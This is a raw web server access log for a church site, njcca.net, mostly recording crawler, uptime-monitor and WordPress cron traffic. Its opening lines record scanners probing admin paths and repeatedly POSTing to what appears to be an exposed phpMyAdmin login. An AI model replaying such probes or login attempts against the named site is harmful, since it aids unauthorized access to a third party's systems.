197.205.129.168 - - [04/Mar/2023:00:12:53 -0800] "GET /admin/ HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" "njcca.net"
197.205.129.168 - - [04/Mar/2023:00:12:55 -0800] "GET /phpMyAdmin/ HTTP/1.1" 200 3554 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" "njcca.net"
197.205.129.168 - - [04/Mar/2023:00:12:56 -0800] "POST /phpMyAdmin/index.php HTTP/1.1" 200 3647 "https://njcca.net/phpMyAdmin/" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" "njcca.net"
185.220.101.136 - - [04/Mar/2023:00:13:02 -0800] "GET /administrator/ HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" "njcca.net"
197.205.129.168 - - [04/Mar/2023:00:13:02 -0800] "GET /phpMyAdmin/ HTTP/1.1" 200 3567 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" "njcca.net"
197.205.129.168 - - [04/Mar/2023:00:13:03 -0800] "POST /phpMyAdmin/index.php HTTP/1.1" 200 3551 "https://njcca.net/phpMyAdmin/" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" "njcca.net"
185.220.101.136 - - [04/Mar/2023:00:13:04 -0800] "GET /administrator/index.php HTTP/1.1" 404 88 "https://njcca.net/administrator/" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" "njcca.net"
197.205.129.168 - - [04/Mar/2023:00:13:09 -0800] "GET /PhpMyAdmin/ HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" "njcca.net"
197.205.129.168 - - [04/Mar/2023:00:13:15 -0800] "GET /pma/ HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" "njcca.net"
185.220.102.250 - - [04/Mar/2023:00:13:31 -0800] "GET /wp-login.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" "njcca.net"
185.220.102.250 - - [04/Mar/2023:00:13:33 -0800] "GET /wp-admin/ HTTP/1.1" 404 88 "https://njcca.net/wp-login.php" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" "njcca.net"
185.220.101.162 - - [04/Mar/2023:00:13:38 -0800] "GET /admin.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" "njcca.net"
23.137.251.61 - - [04/Mar/2023:00:13:44 -0800] "GET /admin HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" "njcca.net"
23.128.248.25 - - [04/Mar/2023:00:13:52 -0800] "GET /admin HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" "njcca.net"
185.220.100.246 - - [04/Mar/2023:00:13:59 -0800] "GET /admin/ HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" "njcca.net"
114.119.154.229 - - [04/Mar/2023:00:16:01 -0800] "GET /HolyCross/?paged=15 HTTP/1.1" 200 51378 "https://njcca.net/HolyCross/?paged=18" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "njcca.net"
192.42.116.192 - - [04/Mar/2023:00:16:07 -0800] "GET /praiseyeshua/2015/06/28/video/ HTTP/1.1" 404 73 "https://njcca.net/praiseyeshua/2015/06/28/video/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "njcca.net"
10.247.24.80 - - [04/Mar/2023:00:16:04 -0800] "POST /HolyCross/wp-cron.php?doing_wp_cron=1677917764.9280300140380859375000 HTTP/1.1" 200 - "https://njcca.net/HolyCross/wp-cron.php?doing_wp_cron=1677917764.9280300140380859375000" "WordPress/6.1.1; https://njcca.net/HolyCross" "njcca.net"
192.42.116.181 - - [04/Mar/2023:00:16:10 -0800] "GET / HTTP/1.1" 200 51141 "https://njcca.net/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "njcca.net"
192.42.116.181 - - [04/Mar/2023:00:16:16 -0800] "GET /HolyCross/?page_id=1147 HTTP/1.1" 200 33264 "https://njcca.net/HolyCross/?page_id=1147" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "njcca.net"
192.0.102.40 - - [04/Mar/2023:00:17:25 -0800] "HEAD /HolyCross HTTP/1.1" 301 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
207.241.236.58 - - [04/Mar/2023:00:17:25 -0800] "GET /HolyCross/?p=6351 HTTP/1.1" 200 27576 "-" "Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:00:17:25 -0800] "HEAD /HolyCross/ HTTP/1.1" 200 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:00:17:38 -0800] "HEAD /BibleStudy HTTP/1.1" 301 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:00:17:38 -0800] "HEAD /BibleStudy/ HTTP/1.1" 200 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
10.247.24.80 - - [04/Mar/2023:00:17:42 -0800] "POST /BibleStudy/wp-cron.php?doing_wp_cron=1677917862.2646141052246093750000 HTTP/1.1" 500 100 "https://njcca.net/BibleStudy/wp-cron.php?doing_wp_cron=1677917862.2646141052246093750000" "WordPress/6.0.3; https://njcca.net/BibleStudy" "njcca.net"
66.249.66.66 - - [04/Mar/2023:00:20:39 -0800] "GET /pdf/Paul/24_beloved_shepherd.pdf HTTP/1.1" 200 167124 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 (compatible; GoogleOther)" "praise.njcca.net"
114.119.157.54 - - [04/Mar/2023:00:22:47 -0800] "GET /HolyCross/index.php/comments/feed/?paged=31 HTTP/1.1" 200 51290 "https://njcca.net/HolyCross/index.php/comments/feed/?paged=16" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "njcca.net"
10.247.24.81 - - [04/Mar/2023:00:22:53 -0800] "POST /HolyCross/wp-cron.php?doing_wp_cron=1677918173.1704149246215820312500 HTTP/1.1" 200 - "https://njcca.net/HolyCross/wp-cron.php?doing_wp_cron=1677918173.1704149246215820312500" "WordPress/6.1.1; https://njcca.net/HolyCross" "njcca.net"
192.0.102.40 - - [04/Mar/2023:00:24:29 -0800] "HEAD /HolyCross HTTP/1.1" 301 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:00:24:34 -0800] "HEAD /BibleStudy HTTP/1.1" 301 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:00:24:29 -0800] "HEAD /HolyCross/ HTTP/1.1" 200 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
10.247.24.81 - - [04/Mar/2023:00:24:33 -0800] "POST /HolyCross/wp-cron.php?doing_wp_cron=1677918273.5430140495300292968750 HTTP/1.1" 200 - "https://njcca.net/HolyCross/wp-cron.php?doing_wp_cron=1677918273.5430140495300292968750" "WordPress/6.1.1; https://njcca.net/HolyCross" "njcca.net"
192.0.102.40 - - [04/Mar/2023:00:24:34 -0800] "HEAD /BibleStudy/ HTTP/1.1" 200 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
10.247.24.79 - - [04/Mar/2023:00:24:38 -0800] "POST /BibleStudy/wp-cron.php?doing_wp_cron=1677918278.3377249240875244140625 HTTP/1.1" 500 100 "https://njcca.net/BibleStudy/wp-cron.php?doing_wp_cron=1677918278.3377249240875244140625" "WordPress/6.0.3; https://njcca.net/BibleStudy" "njcca.net"
114.119.130.43 - - [04/Mar/2023:00:28:43 -0800] "GET /HolyCross/?page_id=922 HTTP/1.1" 200 34538 "https://njcca.net/HolyCross/?p=1628" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "njcca.net"
10.247.24.81 - - [04/Mar/2023:00:28:48 -0800] "POST /HolyCross/wp-cron.php?doing_wp_cron=1677918528.2086141109466552734375 HTTP/1.1" 200 - "https://njcca.net/HolyCross/wp-cron.php?doing_wp_cron=1677918528.2086141109466552734375" "WordPress/6.1.1; https://njcca.net/HolyCross" "njcca.net"
207.241.236.58 - - [04/Mar/2023:00:32:27 -0800] "GET /HolyCross/?p=6351 HTTP/1.1" 200 27576 "-" "Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot)" "njcca.net"
10.247.24.79 - - [04/Mar/2023:00:32:31 -0800] "POST /HolyCross/wp-cron.php?doing_wp_cron=1677918751.4246881008148193359375 HTTP/1.1" 200 - "https://njcca.net/HolyCross/wp-cron.php?doing_wp_cron=1677918751.4246881008148193359375" "WordPress/6.1.1; https://njcca.net/HolyCross" "njcca.net"
192.0.102.40 - - [04/Mar/2023:00:32:59 -0800] "HEAD /HolyCross HTTP/1.1" 301 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:00:32:59 -0800] "HEAD /HolyCross/ HTTP/1.1" 200 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:00:33:37 -0800] "HEAD /BibleStudy HTTP/1.1" 301 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:00:33:37 -0800] "HEAD /BibleStudy/ HTTP/1.1" 200 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
114.119.147.71 - - [04/Mar/2023:00:36:32 -0800] "GET /HolyCross/index.php/feed/?paged=4 HTTP/1.1" 200 53251 "https://njcca.net/HolyCross/index.php/feed/?paged=20" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "njcca.net"
10.247.24.80 - - [04/Mar/2023:00:36:35 -0800] "POST /HolyCross/wp-cron.php?doing_wp_cron=1677918995.8035719394683837890625 HTTP/1.1" 200 - "https://njcca.net/HolyCross/wp-cron.php?doing_wp_cron=1677918995.8035719394683837890625" "WordPress/6.1.1; https://njcca.net/HolyCross" "njcca.net"
10.247.24.79 - - [04/Mar/2023:00:33:41 -0800] "POST /BibleStudy/wp-cron.php?doing_wp_cron=1677918821.1875638961791992187500 HTTP/1.1" 500 100 "https://njcca.net/BibleStudy/wp-cron.php?doing_wp_cron=1677918821.1875638961791992187500" "WordPress/6.0.3; https://njcca.net/BibleStudy" "njcca.net"
192.0.102.40 - - [04/Mar/2023:00:40:24 -0800] "HEAD /BibleStudy HTTP/1.1" 301 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:00:40:28 -0800] "HEAD /HolyCross HTTP/1.1" 301 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:00:40:24 -0800] "HEAD /BibleStudy/ HTTP/1.1" 200 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:00:40:28 -0800] "HEAD /HolyCross/ HTTP/1.1" 200 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
10.247.24.80 - - [04/Mar/2023:00:40:32 -0800] "POST /HolyCross/wp-cron.php?doing_wp_cron=1677919232.6644759178161621093750 HTTP/1.1" 200 - "https://njcca.net/HolyCross/wp-cron.php?doing_wp_cron=1677919232.6644759178161621093750" "WordPress/6.1.1; https://njcca.net/HolyCross" "njcca.net"
10.247.24.79 - - [04/Mar/2023:00:40:29 -0800] "POST /BibleStudy/wp-cron.php?doing_wp_cron=1677919229.0001299381256103515625 HTTP/1.1" 500 100 "https://njcca.net/BibleStudy/wp-cron.php?doing_wp_cron=1677919229.0001299381256103515625" "WordPress/6.0.3; https://njcca.net/BibleStudy" "njcca.net"
114.119.129.14 - - [04/Mar/2023:00:45:46 -0800] "GET /HolyCross/index.php/2018/12/?paged=13 HTTP/1.1" 200 50100 "https://njcca.net/HolyCross/index.php/2018/12/?paged=10" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "njcca.net"
10.247.24.79 - - [04/Mar/2023:00:45:52 -0800] "POST /HolyCross/wp-cron.php?doing_wp_cron=1677919552.5338559150695800781250 HTTP/1.1" 200 - "https://njcca.net/HolyCross/wp-cron.php?doing_wp_cron=1677919552.5338559150695800781250" "WordPress/6.1.1; https://njcca.net/HolyCross" "njcca.net"
207.241.236.58 - - [04/Mar/2023:00:47:29 -0800] "GET /HolyCross/?p=6351 HTTP/1.1" 200 27576 "-" "Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot)" "njcca.net"
10.247.24.79 - - [04/Mar/2023:00:47:34 -0800] "POST /HolyCross/wp-cron.php?doing_wp_cron=1677919654.0335609912872314453125 HTTP/1.1" 200 - "https://njcca.net/HolyCross/wp-cron.php?doing_wp_cron=1677919654.0335609912872314453125" "WordPress/6.1.1; https://njcca.net/HolyCross" "njcca.net"
51.222.253.1 - - [04/Mar/2023:00:47:41 -0800] "GET /HolyCross/?m=202303 HTTP/1.1" 200 33440 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:00:48:43 -0800] "HEAD /HolyCross HTTP/1.1" 301 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:00:48:43 -0800] "HEAD /HolyCross/ HTTP/1.1" 200 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
10.247.24.80 - - [04/Mar/2023:00:48:47 -0800] "POST /HolyCross/wp-cron.php?doing_wp_cron=1677919727.9258830547332763671875 HTTP/1.1" 200 - "https://njcca.net/HolyCross/wp-cron.php?doing_wp_cron=1677919727.9258830547332763671875" "WordPress/6.1.1; https://njcca.net/HolyCross" "njcca.net"
192.0.102.40 - - [04/Mar/2023:00:49:00 -0800] "HEAD /BibleStudy HTTP/1.1" 301 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:00:49:00 -0800] "HEAD /BibleStudy/ HTTP/1.1" 200 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
27.240.177.255 - - [04/Mar/2023:00:49:50 -0800] "GET /pdf/Philip/14_love_in_wind.pdf HTTP/1.1" 200 152897 "-" "Mozilla/5.0 (Linux; Android 12; CPH2211) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36" "praise.njcca.net"
61.135.159.168 - - [04/Mar/2023:00:49:52 -0800] "GET / HTTP/1.1" 200 51100 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "njcca.net"
10.247.24.79 - - [04/Mar/2023:00:49:03 -0800] "POST /BibleStudy/wp-cron.php?doing_wp_cron=1677919743.6822760105133056640625 HTTP/1.1" 500 100 "https://njcca.net/BibleStudy/wp-cron.php?doing_wp_cron=1677919743.6822760105133056640625" "WordPress/6.0.3; https://njcca.net/BibleStudy" "njcca.net"
114.119.146.98 - - [04/Mar/2023:00:51:50 -0800] "GET /HolyCross/index.php/comments/feed/?paged=29 HTTP/1.1" 200 51595 "https://njcca.net/HolyCross/index.php/comments/feed/?paged=16" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "njcca.net"
10.247.24.81 - - [04/Mar/2023:00:51:54 -0800] "POST /HolyCross/wp-cron.php?doing_wp_cron=1677919914.6923780441284179687500 HTTP/1.1" 200 - "https://njcca.net/HolyCross/wp-cron.php?doing_wp_cron=1677919914.6923780441284179687500" "WordPress/6.1.1; https://njcca.net/HolyCross" "njcca.net"
192.0.102.40 - - [04/Mar/2023:00:55:56 -0800] "HEAD /BibleStudy HTTP/1.1" 301 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:00:55:56 -0800] "HEAD /BibleStudy/ HTTP/1.1" 200 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:00:56:15 -0800] "HEAD /HolyCross HTTP/1.1" 301 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:00:56:15 -0800] "HEAD /HolyCross/ HTTP/1.1" 200 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
10.247.24.80 - - [04/Mar/2023:00:56:18 -0800] "POST /HolyCross/wp-cron.php?doing_wp_cron=1677920178.3359351158142089843750 HTTP/1.1" 200 - "https://njcca.net/HolyCross/wp-cron.php?doing_wp_cron=1677920178.3359351158142089843750" "WordPress/6.1.1; https://njcca.net/HolyCross" "njcca.net"
114.119.133.152 - - [04/Mar/2023:00:57:25 -0800] "GET /HolyCross/index.php/category/uncategorized/?paged=24 HTTP/1.1" 200 52806 "https://njcca.net/HolyCross/index.php/category/uncategorized/?paged=25" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "njcca.net"
10.247.24.81 - - [04/Mar/2023:00:56:01 -0800] "POST /BibleStudy/wp-cron.php?doing_wp_cron=1677920161.0990209579467773437500 HTTP/1.1" 500 100 "https://njcca.net/BibleStudy/wp-cron.php?doing_wp_cron=1677920161.0990209579467773437500" "WordPress/6.0.3; https://njcca.net/BibleStudy" "njcca.net"
207.241.236.58 - - [04/Mar/2023:01:02:32 -0800] "GET /HolyCross/?p=6351 HTTP/1.1" 200 27576 "-" "Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot)" "njcca.net"
10.247.24.79 - - [04/Mar/2023:01:02:36 -0800] "POST /HolyCross/wp-cron.php?doing_wp_cron=1677920556.1412088871002197265625 HTTP/1.1" 200 - "https://njcca.net/HolyCross/wp-cron.php?doing_wp_cron=1677920556.1412088871002197265625" "WordPress/6.1.1; https://njcca.net/HolyCross" "njcca.net"
208.68.7.129 - - [04/Mar/2023:01:03:06 -0800] "GET /praiseyeshua/2015/06/28/video/ HTTP/1.1" 404 73 "https://njcca.net/praiseyeshua/2015/06/28/video/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "njcca.net"
208.68.7.129 - - [04/Mar/2023:01:03:09 -0800] "GET / HTTP/1.1" 200 51100 "https://njcca.net/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "njcca.net"
17.241.227.185 - - [04/Mar/2023:01:03:21 -0800] "GET /robots.txt HTTP/1.1" 200 52 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)" "njcca.net"
185.220.103.117 - - [04/Mar/2023:01:03:19 -0800] "GET /HolyCross/?page_id=1147 HTTP/1.1" 200 33264 "https://njcca.net/HolyCross/?page_id=1147" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "njcca.net"
17.241.227.185 - - [04/Mar/2023:01:03:21 -0800] "GET / HTTP/1.1" 200 51100 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:01:04:28 -0800] "HEAD /BibleStudy HTTP/1.1" 301 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:01:04:30 -0800] "HEAD /HolyCross HTTP/1.1" 301 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:01:04:28 -0800] "HEAD /BibleStudy/ HTTP/1.1" 200 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:01:04:31 -0800] "HEAD /HolyCross/ HTTP/1.1" 200 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
10.247.24.79 - - [04/Mar/2023:01:04:33 -0800] "POST /HolyCross/wp-cron.php?doing_wp_cron=1677920673.8566639423370361328125 HTTP/1.1" 200 - "https://njcca.net/HolyCross/wp-cron.php?doing_wp_cron=1677920673.8566639423370361328125" "WordPress/6.1.1; https://njcca.net/HolyCross" "njcca.net"
114.119.135.107 - - [04/Mar/2023:01:06:12 -0800] "GET /HolyCross/index.php/2018/12/26/hello-world/?paged=17 HTTP/1.1" 200 52620 "https://njcca.net/HolyCross/index.php/2018/12/26/hello-world/?paged=19" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "njcca.net"
10.247.24.80 - - [04/Mar/2023:01:06:15 -0800] "POST /HolyCross/wp-cron.php?doing_wp_cron=1677920775.6344480514526367187500 HTTP/1.1" 200 - "https://njcca.net/HolyCross/wp-cron.php?doing_wp_cron=1677920775.6344480514526367187500" "WordPress/6.1.1; https://njcca.net/HolyCross" "njcca.net"
10.247.24.79 - - [04/Mar/2023:01:04:33 -0800] "POST /BibleStudy/wp-cron.php?doing_wp_cron=1677920673.4137599468231201171875 HTTP/1.1" 500 100 "https://njcca.net/BibleStudy/wp-cron.php?doing_wp_cron=1677920673.4137599468231201171875" "WordPress/6.0.3; https://njcca.net/BibleStudy" "njcca.net"
192.0.102.40 - - [04/Mar/2023:01:11:44 -0800] "HEAD /HolyCross HTTP/1.1" 301 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:01:11:45 -0800] "HEAD /HolyCross/ HTTP/1.1" 200 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
10.247.24.79 - - [04/Mar/2023:01:11:50 -0800] "POST /HolyCross/wp-cron.php?doing_wp_cron=1677921110.8060359954833984375000 HTTP/1.1" 200 - "https://njcca.net/HolyCross/wp-cron.php?doing_wp_cron=1677921110.8060359954833984375000" "WordPress/6.1.1; https://njcca.net/HolyCross" "njcca.net"
192.0.102.40 - - [04/Mar/2023:01:11:58 -0800] "HEAD /BibleStudy HTTP/1.1" 301 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:01:11:58 -0800] "HEAD /BibleStudy/ HTTP/1.1" 200 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
114.119.142.72 - - [04/Mar/2023:01:13:09 -0800] "GET /HolyCross/?paged=21 HTTP/1.1" 200 52671 "https://njcca.net/HolyCross/?paged=22" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "njcca.net"
10.247.24.80 - - [04/Mar/2023:01:12:02 -0800] "POST /BibleStudy/wp-cron.php?doing_wp_cron=1677921122.3588559627532958984375 HTTP/1.1" 500 100 "https://njcca.net/BibleStudy/wp-cron.php?doing_wp_cron=1677921122.3588559627532958984375" "WordPress/6.0.3; https://njcca.net/BibleStudy" "njcca.net"
114.119.141.18 - - [04/Mar/2023:01:15:19 -0800] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "praise.njcca.net"
207.241.236.58 - - [04/Mar/2023:01:17:34 -0800] "GET /HolyCross/?p=6351 HTTP/1.1" 200 27576 "-" "Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot)" "njcca.net"
10.247.24.81 - - [04/Mar/2023:01:17:38 -0800] "POST /HolyCross/wp-cron.php?doing_wp_cron=1677921458.5032329559326171875000 HTTP/1.1" 200 - "https://njcca.net/HolyCross/wp-cron.php?doing_wp_cron=1677921458.5032329559326171875000" "WordPress/6.1.1; https://njcca.net/HolyCross" "njcca.net"
192.0.102.40 - - [04/Mar/2023:01:20:05 -0800] "HEAD /HolyCross HTTP/1.1" 301 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:01:20:05 -0800] "HEAD /HolyCross/ HTTP/1.1" 200 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
10.247.24.79 - - [04/Mar/2023:01:20:09 -0800] "POST /HolyCross/wp-cron.php?doing_wp_cron=1677921609.4125039577484130859375 HTTP/1.1" 200 - "https://njcca.net/HolyCross/wp-cron.php?doing_wp_cron=1677921609.4125039577484130859375" "WordPress/6.1.1; https://njcca.net/HolyCross" "njcca.net"
192.0.102.40 - - [04/Mar/2023:01:20:19 -0800] "HEAD /BibleStudy HTTP/1.1" 301 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:01:20:19 -0800] "HEAD /BibleStudy/ HTTP/1.1" 200 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
51.222.253.10 - - [04/Mar/2023:01:20:28 -0800] "GET /HolyCross/?p=6351 HTTP/1.1" 200 38486 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "njcca.net"
114.119.144.38 - - [04/Mar/2023:01:21:00 -0800] "GET /HolyCross/?page_id=889 HTTP/1.1" 200 33132 "https://njcca.net/HolyCross/?p=1628" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "njcca.net"
10.247.24.80 - - [04/Mar/2023:01:20:23 -0800] "POST /BibleStudy/wp-cron.php?doing_wp_cron=1677921623.1939098834991455078125 HTTP/1.1" 500 100 "https://njcca.net/BibleStudy/wp-cron.php?doing_wp_cron=1677921623.1939098834991455078125" "WordPress/6.0.3; https://njcca.net/BibleStudy" "njcca.net"
123.125.109.39 - - [04/Mar/2023:01:23:14 -0800] "GET / HTTP/1.1" 200 51141 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:01:27:09 -0800] "HEAD /HolyCross HTTP/1.1" 301 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:01:27:09 -0800] "HEAD /HolyCross/ HTTP/1.1" 200 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
10.247.24.81 - - [04/Mar/2023:01:27:14 -0800] "POST /HolyCross/wp-cron.php?doing_wp_cron=1677922033.9809079170227050781250 HTTP/1.1" 200 - "https://njcca.net/HolyCross/wp-cron.php?doing_wp_cron=1677922033.9809079170227050781250" "WordPress/6.1.1; https://njcca.net/HolyCross" "njcca.net"
